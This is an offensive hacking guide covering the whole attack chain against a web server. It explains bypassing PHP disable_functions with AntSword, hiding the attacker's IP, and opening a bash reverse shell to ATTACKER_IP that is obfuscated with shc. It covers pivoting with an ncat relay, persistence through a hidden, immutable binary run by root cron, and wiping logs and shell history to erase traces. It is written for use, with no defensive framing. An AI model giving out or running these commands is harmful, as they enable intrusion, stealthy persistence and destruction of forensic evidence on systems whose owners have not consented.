Bypassing PHP disable_functions and Building Encrypted Reverse Shells: A Hands‑On Guide

Bypassing PHP disable_functions

Use the official AntSword bypass plugin for automatic evasion, or manually try the repository at AntSword‑Labs/bypass_disable_functions if automatic bypass fails.

Check the web application's stored database credentials and explore file write or log write possibilities for privilege escalation if bypass fails.

Hiding Attack IP

Hide the attacking IP using CDN services or cloud functions; note that accessing foreign servers may be restricted, and using domestic cloud providers may require real‑name registration and incur costs.

Encrypted Bash Reverse Shell

Standard reverse shell command:

bash -i & /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0&1

Receive it on the attacker with netcat: nc -lvvp ATTACKER_PORT Encrypt the bash script with shc , which generates a C source file and a compiled binary. Transfer the binary to the target and execute it.

./shc -Uvrf reverse.sh -o reverse

./reverse

If commands like bash or nc are blocked, first try privilege escalation, then test outbound connectivity by probing common ports with nmap --top-ports 100 or 1000.

Testing Outbound Ports

Modify an existing nginx configuration to add a new listen port, then create a shell script that curls each candidate port on your VPS, run it on the target, and examine the results.

listen NEW_PORT;

curl vps:PORT

./shfile > result.txt

Upgrading to a Full Interactive Shell

After receiving a limited shell, upgrade it with:

python -c 'import pty; pty.spawn("/bin/bash")'

stty raw -echo

export SHELL=bash

export TERM=xterm-256color

Use screen to keep the session alive:

screen -S session_name

Ctrl‑a, Ctrl‑d   # detach

screen -r session_name   # reattach

exit   # terminate a screen

Privilege Escalation and Persistence

Gather system information from /proc/version and /etc/*-release, search Exploit‑DB for relevant exploits, and compile needed binaries locally if the target cannot compile.

For persistence, use cron jobs. Upload the encrypted binary, make it executable, hide it (prefix with a dot), and lock it with chattr +i. Add a cron entry: * * * * * root /path/to/.binary Non‑root users should edit their crontab with crontab -e. Ensure the cron environment defines SHELL, PATH, and disables email notifications with MAILTO="".

Internal Network Pivoting

Perform port scanning with nmap or the recommended fscan. Set up a SOCKS5 proxy using frp (client on the target, server on your VPS) or Neo‑reGeorg by uploading a PHP/JSP payload.

For targets that cannot reach the internet, forward the reverse shell through an intermediate machine using ncat:

ncat -l LOCAL_PORT -c 'ncat ATTACKER_IP ATTACKER_PORT'

Trace Cleaning

Clear logs and command history aggressively (use with caution):

echo -n > /var/log/syslog
... (repeat for other log files)
history -c
echo > ~/.bash_history
HISTSIZE=0

Note that complete removal is difficult and may leave artifacts.